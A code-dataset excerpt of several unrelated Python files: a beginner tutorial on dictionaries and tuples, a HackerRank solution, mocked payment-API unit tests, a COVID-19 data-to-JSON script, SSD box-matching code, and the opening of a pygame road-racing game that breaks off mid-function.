my_dict = {1: 'apple', 2: 'ball'}
# dictionary with mixed keys
my_dict = {'name': 'John', 1: [2, 4, 3]}
# using dict()
my_dict = dict({1:'apple', 2:'ball'})
# from sequence having each item as a pair
my_dict = dict([(1,'apple'), (2,'ball')])
# In[20]:
# get vs [] for retrieving elements
my_dict = {'name': 'Jack', 'age': 26}
# Output: Jack
print(my_dict['name'])
# Output: 26
print(my_dict.get('age'))
# In[21]:
# Changing and adding Dictionary Elements
my_dict = {'name': 'Jack', 'age': 26}
# update value
my_dict['age'] = 27
#Output: {'age': 27, 'name': 'Jack'}
print(my_dict)
# add item
my_dict['address'] = 'Downtown'
# Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'}
print(my_dict)
# In[22]:
#Sets and its function
# In[23]:
my_set = {1, 2, 3}
print(my_set)
# In[24]:
my_set = {1.0, "Hello", (1, 2, 3)}
print(my_set)
# In[25]:
# set cannot have duplicates
my_set = {1, 2, 3, 4, 3, 2}
print(my_set)
# In[26]:
#Tuple and its method
# In[27]:
# Tuple having integers
my_tuple = (1, 2, 3)
print(my_tuple)
# In[28]:
my_tuple = ("hello")
print(type(my_tuple))
# In[30]:
# Accessing tuple elements using indexing
my_tuple = ('p','e','r','m','i','t')
print(my_tuple[0])
print(my_tuple[5])
# In[31]:
print(my_tuple[-1])
# In[32]:
print(my_tuple[-6])
# In[36]:
# Changing tuple values
my_tuple = (4, 2, 3, [6, 5])
# TypeError: 'tuple' object does not support item assignment
# my_tuple[1] = 9
# However, item of mutable element can be changed
my_tuple[3][0] = 9 # Output: (4, 2, 3, [9, 5])
print(my_tuple)
# Tuples can be reassigned
my_tuple = ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')
# Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')
print(my_tuple)
# In[37]:
#String and its function
# In[38]:
# Python string examples - all assignments are identical.
String_var = 'Python'
String_var = "Python"
String_var = """Python"""
# with Triple quotes Strings can extend to multiple lines
String_var = """ This document will help you to
explore all the concepts
of Python Strings!!! """
# Replace "document" with "tutorial" and store in another variable
substr_var = String_var.replace("document", "tutorial")
print (substr_var)
# In[ ]:
| 4.53125 | 5 |
hackerrank/pickingNumbers.py | irvandindaprakoso/online-test-py | 0 | 1259 | def pickingNumbers(a):
# Write your code here
max = 0
for i in a:
c = a.count(i)
d = a.count(i-1)
e = c+d
if e>max:
max = e
return max
| 3.25 | 3 |
tests/test_api_transaction.py | preston-wagner/authorizesauce | 0 | 1260 | from datetime import date
from six import BytesIO, binary_type, u
from six.moves.urllib.parse import parse_qsl, urlencode
from unittest2 import TestCase
import mock
from authorizesauce.apis.transaction import PROD_URL, TEST_URL, TransactionAPI
from authorizesauce.data import Address, CreditCard
from authorizesauce.exceptions import AuthorizeConnectionError, \
AuthorizeResponseError
class MockResponse(BytesIO):
class Headers(dict):
def getparam(self, *args, **kwargs):
"""Python 2 version"""
return None
def get_content_charset(self, failobj=None, *args, **kwargs):
"""Python 3 version"""
return failobj
def __init__(self, *args, **kwargs):
BytesIO.__init__(self, *args, **kwargs)
self.headers = self.Headers()
SUCCESS = MockResponse(
b'1;1;1;This transaction has been approved.;IKRAGJ;Y;2171062816;;;20.00;CC'
b';auth_only;;Jeffrey;Schenck;;<NAME>;Venice;CA;90291;USA;;;;;;;;;;;;'
b';;;;;375DD9293D7605E20DF0B437EE2A7B92;P;2;;;;;;;;;;;XXXX1111;Visa;;;;;;;'
b';;;;;;;;;;Y')
PARSED_SUCCESS = {
'cvv_response': 'P',
'authorization_code': 'IKRAGJ',
'response_code': '1',
'amount': '20.00',
'transaction_type': 'auth_only',
'avs_response': 'Y',
'response_reason_code': '1',
'response_reason_text': 'This transaction has been approved.',
'transaction_id': '2171062816',
}
ERROR = MockResponse(
b'2;1;2;This transaction has been declined.;000000;N;2171062816;;;20.00;CC'
b';auth_only;;Jeffrey;Schenck;;45 Rose Ave;Venice;CA;90291;USA;;;;;;;;;;;;'
b';;;;;375DD9293D7605E20DF0B437EE2A7B92;N;1;;;;;;;;;;;XXXX1111;Visa;;;;;;;'
b';;;;;;;;;;Y')
PARSED_ERROR = {
'cvv_response': 'N',
'authorization_code': '000000',
'response_code': '2',
'amount': '20.00',
'transaction_type': 'auth_only',
'avs_response': 'N',
'response_reason_code': '2',
'response_reason_text': 'This transaction has been declined.',
'transaction_id': '2171062816',
}
def _unicode_str(s):
if isinstance(s, binary_type):
return s.decode('unicode_escape')
return s
def _are_params_eq(params1, params2):
_params1, _params2 = map(_unicode_str, (params1, params2))
return frozenset(parse_qsl(_params1)) == frozenset(parse_qsl(_params2))
class TransactionAPITests(TestCase):
def setUp(self):
self.api = TransactionAPI('123', '456')
self.success = lambda *args, **kwargs: SUCCESS.seek(0) or SUCCESS
self.error = lambda *args, **kwargs: ERROR.seek(0) or ERROR
self.year = date.today().year + 10
self.credit_card = CreditCard('4111111111111111', self.year, 1, '911')
self.address = Address('45 Rose Ave', 'Venice', 'CA', '90291')
def test_basic_api(self):
api = TransactionAPI('123', '456')
self.assertEqual(api.url, TEST_URL)
api = TransactionAPI('123', '456', debug=False)
self.assertEqual(api.url, PROD_URL)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_make_call(self, urlopen):
urlopen.side_effect = self.success
params = {'a': '1', 'b': '2'}
result = self.api._make_call(params)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(_are_params_eq(
urlopen.call_args[1]['data'], urlencode(params)
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_make_call_with_unicode(self, urlopen):
urlopen.side_effect = self.success
result = self.api._make_call({u('\xe3'): '1', 'b': u('\xe3')})
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(_are_params_eq(
urlopen.call_args[1]['data'], 'b=%C3%A3&%C3%A3=1'
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_make_call_connection_error(self, urlopen):
urlopen.side_effect = IOError('Borked')
self.assertRaises(AuthorizeConnectionError, self.api._make_call,
{'a': '1', 'b': '2'})
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_make_call_response_error(self, urlopen):
urlopen.side_effect = self.error
try:
self.api._make_call({'a': '1', 'b': '2'})
except AuthorizeResponseError as e:
self.assertTrue(str(e).startswith(
'This transaction has been declined.'
))
self.assertEqual(e.full_response, PARSED_ERROR)
def test_add_params(self):
self.assertEqual(self.api._add_params({}), {})
params = self.api._add_params({}, credit_card=self.credit_card)
self.assertEqual(params, {
'x_card_num': '4111111111111111',
'x_exp_date': '01-{0}'.format(self.year),
'x_card_code': '911',
})
params = self.api._add_params({}, address=self.address)
self.assertEqual(params, {
'x_address': '45 Rose Ave',
'x_city': 'Venice',
'x_state': 'CA',
'x_zip': '90291',
'x_country': 'US',
})
params = self.api._add_params(
{}, credit_card=self.credit_card, address=self.address
)
self.assertEqual(params, {
'x_card_num': '4111111111111111',
'x_exp_date': '01-{0}'.format(self.year),
'x_card_code': '911',
'x_address': '45 Rose Ave',
'x_city': 'Venice',
'x_state': 'CA',
'x_zip': '90291',
'x_country': 'US',
})
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_auth(self, urlopen):
urlopen.side_effect = self.success
result = self.api.auth(20, self.credit_card, self.address)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'x_login=123&x_zip=90291&x_card_num=4111111111111111&'
'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&'
'x_version=3.1&x_state=CA&x_delim_char=%3B&'
'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE'
'&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format(
str(self.year)
)
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_capture(self, urlopen):
urlopen.side_effect = self.success
result = self.api.capture(20, self.credit_card, self.address)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'x_login=123&x_zip=90291&x_card_num=4111111111111111&'
'x_amount=20.00&x_tran_key=456&x_city=Venice&x_country=US&'
'x_version=3.1&x_state=CA&x_delim_char=%3B&'
'x_address=45+Rose+Ave&x_exp_date=01-{0}&x_test_request=FALSE'
'&x_card_code=911&x_type=AUTH_ONLY&x_delim_data=TRUE'.format(
str(self.year)
)
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_settle(self, urlopen):
urlopen.side_effect = self.success
# Test without specified amount
result = self.api.settle('123456')
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'https://test.authorize.net/gateway/transact.dll?x_login=123'
'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B'
'&x_type=PRIOR_AUTH_CAPTURE&x_delim_data=TRUE&x_tran_key=456'
'&x_test_request=FALSE'
))
self.assertEqual(result, PARSED_SUCCESS)
# Test with specified amount
result = self.api.settle('123456', amount=10)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'https://test.authorize.net/gateway/transact.dll?x_login=123'
'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B'
'&x_type=PRIOR_AUTH_CAPTURE&x_amount=10.00&x_delim_data=TRUE'
'&x_tran_key=456&x_test_request=FALSE'
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_credit(self, urlopen):
urlopen.side_effect = self.success
# Test with transaction_id, amount
result = self.api.credit('1111', '123456', 10)
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'https://test.authorize.net/gateway/transact.dll?x_login=123'
'&x_trans_id=123456&x_version=3.1&x_amount=10.00'
'&x_delim_char=%3B&x_type=CREDIT&x_card_num=1111'
'&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE'
))
self.assertEqual(result, PARSED_SUCCESS)
@mock.patch('authorizesauce.apis.transaction.urlopen')
def test_void(self, urlopen):
urlopen.side_effect = self.success
result = self.api.void('123456')
self.assertEqual(urlopen.call_args[0][0], TEST_URL)
self.assertTrue(urlopen.call_args[1]['data'], (
'https://test.authorize.net/gateway/transact.dll?x_login=123'
'&x_trans_id=123456&x_version=3.1&x_delim_char=%3B&x_type=VOID'
'&x_delim_data=TRUE&x_tran_key=456&x_test_request=FALSE'
))
self.assertEqual(result, PARSED_SUCCESS)
| 2.21875 | 2 |
build_json.py | sungpyocho/covid19-aichi-tools | 0 | 1261 | <reponame>sungpyocho/covid19-aichi-tools
import csv
import io
import json
import pandas as pd
import sys
from dateutil import tz
from datetime import datetime, date, time, timedelta
# Japan Standard Time (UTC + 09:00)
JST = tz.gettz('Asia/Tokyo')
JST_current_time = datetime.now(tz=JST).strftime('%Y/%m/%d %H:%M')
patients_list = []
patients_summary_dic = {}
# 引数を取得 異常系処理はしてないので注意
args = sys.argv
with open('data/patients.csv', 'r', encoding="utf-8") as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
patients_list.append(row)
patients_summary_dic.setdefault(row['date'], 0)
patients_summary_dic[row['date']] += 1
# 日付のリストを生成
strdt = datetime.strptime("2020-01-26", '%Y-%m-%d') # 開始日
enddt = datetime.strptime(args[1], '%Y-%m-%d') # 終了日
# 日付差の日数を算出(リストに最終日も含めたいので、+1しています)
days_num = (enddt - strdt).days + 1
datelist = []
for i in range(days_num):
datelist.append(strdt + timedelta(days = i))
patients_summary_list = []
# 日付の新しい順に辿って小計が 0 でない日から開始する
foundZero = True
for date in reversed(datelist):
if (not (date.strftime('%Y-%m-%d') in patients_summary_dic)) and foundZero:
continue
else:
foundZero = False
patients_summary_dic.setdefault(date.strftime('%Y-%m-%d'), 0)
patients_summary_list.append({
"日付": date.strftime('%Y-%m-%d'),
"小計": patients_summary_dic[date.strftime('%Y-%m-%d')]
})
patients_summary_list = patients_summary_list[::-1] # 日付の昇順に並び替え
# main_summary_history.csvをPandasのDataframeに変換
main_summary_history_df = pd.read_csv('data/main_summary_history.csv', keep_default_na=False)
# 検査件数の読み込み
inspections_summary_list = []
with open('data/inspections_summary.csv', 'r', encoding="utf-8") as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
inspections_summary_list.append({
"日付": datetime.strptime(row['検査日'], '%Y/%m/%d').strftime('%Y-%m-%d'),
"小計": int(row['検査件数(件)']),
"合算": row['合算']
})
data = {
"lastUpdate": JST_current_time,
"patients": {
"date": JST_current_time,
"data": patients_list
},
"patients_summary" : {
"date": JST_current_time,
"data": patients_summary_list
},
"inspections_summary" : {
"date": JST_current_time,
"data": inspections_summary_list
},
"main_summary_history": {
"date": JST_current_time,
"data": json.loads(main_summary_history_df.to_json(orient='records', force_ascii=False))
}
}
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
print(json.dumps(data, indent=4, ensure_ascii=False))
| 2.671875 | 3 |
dl/models/ssd/modules/utils.py | jjjkkkjjj/pytorch.dl | 2 | 1262 | import torch
from ....data.utils.boxes import centroids2corners, iou
def matching_strategy(targets, dboxes, **kwargs):
"""
:param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels)
:param dboxes: shape is (default boxes num, 4)
IMPORTANT: Note that means (cx, cy, w, h)
:param kwargs:
threshold: (Optional) float, threshold for returned indicator
batch_num: (Required) int, batch size
:return:
pos_indicator: Bool Tensor, shape = (batch, default box num). this represents whether each default box is object or background.
matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including background
"""
threshold = kwargs.pop('threshold', 0.5)
batch_num = kwargs.pop('batch_num')
device = dboxes.device
dboxes_num = dboxes.shape[0]
# minus 'box number per image' and 'localization=(cx, cy, w, h)'
class_num = targets[0].shape[1] - 4
# convert centered coordinated to minmax coordinates
dboxes_mm = centroids2corners(dboxes)
# create returned empty Tensor
pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device)
# matching for each batch
index = 0
for b, target in enumerate(targets):
targets_loc, targets_conf = target[:, :4], target[:, 4:]
# overlaps' shape = (object num, default box num)
overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())
"""
best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
best_object_ind_per_dbox[dbox_ind] = object_ind
best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)
pos_ind = best_overlap_per_dbox > threshold
pos_indicator[b] = pos_ind
gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]
neg_ind = torch.logical_not(pos_ind)
gt_conf[b, neg_ind] = 0
gt_conf[b, neg_ind, -1] = 1
"""
# get maximum overlap value for each default box
# shape = (batch num, dboxes num)
overlaps_per_dbox, object_indices = overlaps.max(dim=0)
#object_indices = object_indices.long() # for fancy indexing
# get maximum overlap values for each object
# shape = (batch num, object num)
overlaps_per_object, dbox_indices = overlaps.max(dim=1)
for obj_ind, dbox_ind in enumerate(dbox_indices):
object_indices[dbox_ind] = obj_ind
overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0
pos_ind = overlaps_per_dbox > threshold
# assign targets
matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices]
pos_indicator[b] = pos_ind
# set background flag
neg_ind = torch.logical_not(pos_ind)
matched_targets[b, neg_ind, 4:] = 0
matched_targets[b, neg_ind, -1] = 1
return pos_indicator, matched_targets
def matching_strategy_quads(targets, dboxes, **kwargs):
"""
:param targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels)
:param dboxes: shape is (default boxes num, 4)
IMPORTANT: Note that means (cx, cy, w, h)
:param kwargs:
threshold: (Optional) float, threshold for returned indicator
batch_num: (Required) int, batch size
:return:
pos_indicator: Bool Tensor, shape = (batch, default box num). this represents whether each default box is object or background.
matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including background
"""
threshold = kwargs.pop('threshold', 0.5)
batch_num = kwargs.pop('batch_num')
device = dboxes.device
dboxes_num = dboxes.shape[0]
# minus 'box number per image' and 'localization=(cx, cy, w, h)'
class_num = targets[0].shape[1] - 4 - 8
# convert centered coordinated to minmax coordinates
dboxes_mm = centroids2corners(dboxes)
# create returned empty Tensor
pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty(
(batch_num, dboxes_num, 4 + 8 + class_num), device=device)
# matching for each batch
index = 0
for b, target in enumerate(targets):
targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:]
# overlaps' shape = (object num, default box num)
overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())
"""
best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
best_object_ind_per_dbox[dbox_ind] = object_ind
best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)
pos_ind = best_overlap_per_dbox > threshold
pos_indicator[b] = pos_ind
gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]
neg_ind = torch.logical_not(pos_ind)
gt_conf[b, neg_ind] = 0
gt_conf[b, neg_ind, -1] = 1
"""
# get maximum overlap value for each default box
# shape = (batch num, dboxes num)
overlaps_per_dbox, object_indices = overlaps.max(dim=0)
# object_indices = object_indices.long() # for fancy indexing
# get maximum overlap values for each object
# shape = (batch num, object num)
overlaps_per_object, dbox_indices = overlaps.max(dim=1)
for obj_ind, dbox_ind in enumerate(dbox_indices):
object_indices[dbox_ind] = obj_ind
overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0
pos_ind = overlaps_per_dbox > threshold
# assign targets
matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \
targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices]
pos_indicator[b] = pos_ind
# set background flag
neg_ind = torch.logical_not(pos_ind)
matched_targets[b, neg_ind, 12:] = 0
matched_targets[b, neg_ind, -1] = 1
return pos_indicator, matched_targets
| 2.265625 | 2 |
sandroad.py | lancelee82/bluelake | 0 | 1263 | """
Flatpath, go forward forever.
http://codeincomplete.com/posts/javascript-racer/
http://www.extentofthejam.com/pseudo/
http://pixel.garoux.net/screen/game_list
Usage:
* UP/DOWN/LEFT/RIGHT
* SPACE : hide/show road map
* TAB : replay this road
* RETURN : go to a new road
TODO:
* hill road
* more road sprites
* sound
"""
import math
import random
import time
from starfish import pygm
from starfish import consts
from starfish import sptdraw
from starfish import utils
IMG_POS_BACKGROUND = {
'HILLS': { 'x': 5, 'y': 5, 'w': 1280, 'h': 480 },
'SKY': { 'x': 5, 'y': 495, 'w': 1280, 'h': 480 },
'TREES': { 'x': 5, 'y': 985, 'w': 1280, 'h': 480 },
}
IMG_POS_SPRITES = {
'PALM_TREE': { 'x': 5, 'y': 5, 'w': 215, 'h': 540 },
'BILLBOARD08': { 'x': 230, 'y': 5, 'w': 385, 'h': 265 },
'TREE1': { 'x': 625, 'y': 5, 'w': 360, 'h': 360 },
'DEAD_TREE1': { 'x': 5, 'y': 555, 'w': 135, 'h': 332 },
'BILLBOARD09': { 'x': 150, 'y': 555, 'w': 328, 'h': 282 },
'BOULDER3': { 'x': 230, 'y': 280, 'w': 320, 'h': 220 },
'COLUMN': { 'x': 995, 'y': 5, 'w': 200, 'h': 315 },
'BILLBOARD01': { 'x': 625, 'y': 375, 'w': 300, 'h': 170 },
'BILLBOARD06': { 'x': 488, 'y': 555, 'w': 298, 'h': 190 },
'BILLBOARD05': { 'x': 5, 'y': 897, 'w': 298, 'h': 190 },
'BILLBOARD07': { 'x': 313, 'y': 897, 'w': 298, 'h': 190 },
'BOULDER2': { 'x': 621, 'y': 897, 'w': 298, 'h': 140 },
'TREE2': { 'x': 1205, 'y': 5, 'w': 282, 'h': 295 },
'BILLBOARD04': { 'x': 1205, 'y': 310, 'w': 268, 'h': 170 },
'DEAD_TREE2': { 'x': 1205, 'y': 490, 'w': 150, 'h': 260 },
'BOULDER1': { 'x': 1205, 'y': 760, 'w': 168, 'h': 248 },
'BUSH1': { 'x': 5, 'y': 1097, 'w': 240, 'h': 155 },
'CACTUS': { 'x': 929, 'y': 897, 'w': 235, 'h': 118 },
'BUSH2': { 'x': 255, 'y': 1097, 'w': 232, 'h': 152 },
'BILLBOARD03': { 'x': 5, 'y': 1262, 'w': 230, 'h': 220 },
'BILLBOARD02': { 'x': 245, 'y': 1262, 'w': 215, 'h': 220 },
'STUMP': { 'x': 995, 'y': 330, 'w': 195, 'h': 140 },
'SEMI': { 'x': 1365, 'y': 490, 'w': 122, 'h': 144 },
'TRUCK': { 'x': 1365, 'y': 644, 'w': 100, 'h': 78 },
'CAR03': { 'x': 1383, 'y': 760, 'w': 88, 'h': 55 },
'CAR02': { 'x': 1383, 'y': 825, 'w': 80, 'h': 59 },
'CAR04': { 'x': 1383, 'y': 894, 'w': 80, 'h': 57 },
'CAR01': { 'x': 1205, 'y': 1018, 'w': 80, 'h': 56 },
'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y': 961, 'w': 80, 'h': 45 },
'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018, 'w': 80, 'h': 45 },
'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y': 1018, 'w': 80, 'h': 45 },
'PLAYER_LEFT': { 'x': 995, 'y': 480, 'w': 80, 'h': 41 },
'PLAYER_STRAIGHT': { 'x': 1085, 'y': 480, 'w': 80, 'h': 41 },
'PLAYER_RIGHT': { 'x': 995, 'y': 531, 'w': 80, 'h': 41 }
}
FP_COLOR_WHITE = '#FFFFFF'
FP_COLOR_BLACK = '#000000'
FP_COLOR_YELLOW = '#EEEE00'
FP_COLOR_BLUE = '#00EEEE'
FP_COLORS = {
'SKY': '#72D7EE',
'TREE': '#005108',
'FOG': '#005108',
'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'},
'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' },
'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE},
'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK},
'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'},
}
FP_ROAD = {
'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100 }, # num segments
'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6 },
'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60 },
}
FP_ROAD_SPRTS = {
'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,},
'coin1': {'imgs': ['img_sprts/i_coin1.png'], 'score': 1,},
'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,},
'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,},
'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,},
'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,},
'pot1': {'imgs': ['img_sprts/i_pot1.png'], 'score': -5,},
'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,},
'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,},
'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,},
'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,},
#'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,},
#'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,},
#'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score': -50,},
'blobb': {'imgs': ['img_sprts/blobb1.png'], 'score': -50,},
'chick_fly': {'imgs': ['img_sprts/chick_fly3.png'], 'score': 70,},
'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,},
}
class SptTmpx(sptdraw.SptDrawBase):
def __init__(self, size, *args, **kwargs):
super(SptTmpx, self).__init__(size)
self.draw_on()
def draw_on(self, *args, **kwargs):
self.fill(consts.GREEN)
self.pygm.draw.circle(self.surf, consts.WHITE,
(self.size[0] / 2, self.size[1] / 2),
self.size[0] / 2, 0)
class SptTmpi(pygm.SptImg):
def __init__(self, img_file, *args, **kwargs):
super(SptTmpi, self).__init__(img_file)
class FPSptBg(pygm.SptImgOne):
def __init__(self, img_file, pos, *args, **kwargs):
super(FPSptBg, self).__init__(img_file, pos)
class FPSptSprts(pygm.SptImgOne):
def __init__(self, img_file, pos, *args, **kwargs):
super(FPSptSprts, self).__init__(img_file, pos)
class FPSptFog(sptdraw.SptDrawBase):
def __init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs):
super(FPSptFog, self).__init__(size)
self.c = c
self.h = h
self.draw_on()
def draw_on(self, *args, **kwargs):
#self.fill(self.c)
d = 2
n = self.h / d
for i in range(n):
rct = [0, i * d, self.size[0], d]
#ca = 255 / n * (n - i)
ca = 200 / n * (n - i)
self.c[3] = ca
self.pygm.draw.rect(self.surf, self.c, rct)
class FPSptRdSprts(pygm.SptImg):
def __init__(self, img_file, *args, **kwargs):
super(FPSptRdSprts, self).__init__(img_file)
@classmethod
def create_by_img(cls, img):
return cls(img)
# for test
#o = SptTmpx((40, 40))
#return o
class FPSptRoadB(sptdraw.SptDrawBase):
def __init__(self, size, cfg, *args, **kwargs):
super(FPSptRoadB, self).__init__(size)
self.cfg = cfg
self.car = kwargs.get('car')
self.bg_sky = kwargs.get('bg_sky')
self.bg_hills = kwargs.get('bg_hills')
self.bg_trees = kwargs.get('bg_trees')
self.clr_dark_road = utils.clr_from_str(FP_COLORS['DARK']['road'])
self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass'])
self.rd_reset(init=True)
self.add_fog()
def prms_reset(self, keep_segs=False):
self.e_keys_up = []
self.e_keys_dn = []
self.camera_x = 0.0
self.camera_y = 0.0
self.camera_z = 500.0#1000.0#0.0 == self.camera_h
self.xw = 0.0
self.yw = 0.0
self.zw = 0.0
self.xc = 0.0
self.yc = 0.0
self.zc = 0.0 ##
self.xp = 0.0
self.yp = 0.0
self.xs = 0.0
self.ys = 0.0
self.d = 200.0#100.0#10.0#30.0#1.0
self.w = self.size[0]
self.h = self.size[1]
if not keep_segs:
self.segments = []
self.rd_sprt_objs = {}
self.rd_sprt_cache = [] # for sprites render order
self.track_len = 0.0
self.seg_len = 200.0#100.0#20.0#60.0#200.0#
self.road_w = 2400#2000#600.0#200.0#1000.0#200#
self.camera_h = 500.0#1000.0#
self.speed_max = 300.0#180.0#200.0#100.0
self.lane_w = 60
self.seg_n = 300#200
#self.seg_draw_n = 200#150
self.seg_draw_n = 70#100#200#150
self.speed = 0.0
self.position = 0.0
self.player_x = 0.0#100.0#1000.0#
self.centrifugal = 0.1#0.06#0.08#0.01#0.3
self.player_seg = None
self.base_seg = None # the segment just under the car
self.player_di = 0 # 0:^ 1:> 2:v 3:<
self.player_go = 0 # 0:- 1:^ 2:v
self.speed_dt_up = 1.0#2.0#3.0
self.speed_dt_dn = 2.0#4.0#6.0
self.speed_dt_na = 1.0#3.0
self.player_x_dt = 60.0#30.0#20.0
self.last_seg_i = 0
self.score = 0
self.game_over = False
self.game_score = 0.0
self.tm_start = 0.0
self.tm_end = 0.0
self.tm_last_once = 0.0
self.sky_speed = 0.1#0.05#
self.hill_speed = 0.2#0.1#
self.tree_speed = 0.3#0.15#
def rd_reset(self, init=False, keep_segs=False, segs_file=None):
#if not init and not keep_segs:
if not init:
self.rd_sprts_del_all_objs()
self.prms_reset(keep_segs=keep_segs)
if segs_file is not None:
try:
segs = self.rd_seg_json_load(segs_file)
self.segments = segs
self.track_len = len(self.segments) * self.seg_len
except Exception as e:
print e
self.init_rd_segs_rand_1()
else:
if not keep_segs:
self.init_rd_segs_rand_1()
self.draw_on()
self.rd_seg_render()
def init_rd_segs_rand_1(self):
#self.rd_seg_init(self.seg_n)
#self.rd_seg_init(self.seg_draw_n)
#self.rd_seg_init(100)#20#500#2#10#4#1#100#200
#self.rd_seg_init(random.randint(30, 100))
self.rd_seg_init(random.randint(1, 10)) # for a3c train
self.rd_seg_init_rand_curve()
#self.add_curves()
#self.add_low_rolling_hills(20, 2.0)
##self.add_low_rolling_hills(30, 4.0)
#self.rd_seg_init_rand(10)#50#10#3#1
#segnrand = random.randint(3, 30)
segnrand = random.randint(2, 6) # for a3c train
self.rd_seg_init_rand(segnrand)
# for segment draw
#self.rd_seg_init(self.seg_draw_n)
#self.rd_seg_init(100)#20#500#2#10#4#1#100#200
self.rd_seg_init(10) # for a3c train
self.rd_start_seg_init()
self.rd_sprts_init_rand()
def draw_on(self, *args, **kwargs):
self.fill(self.clr_dark_grass)
def add_fog(self):
self.fog = FPSptFog(self.size)
self.fog.rect.top = 240
self.fog.rect.left = 0
self.disp_add(self.fog)
def get_seg_base_i(self, pos=None):
if pos is None:
pos = self.position
i = int(pos / self.seg_len)
#x#i = int(utils.math_round(pos / self.seg_len))
#i = int(math.floor(pos / self.seg_len))
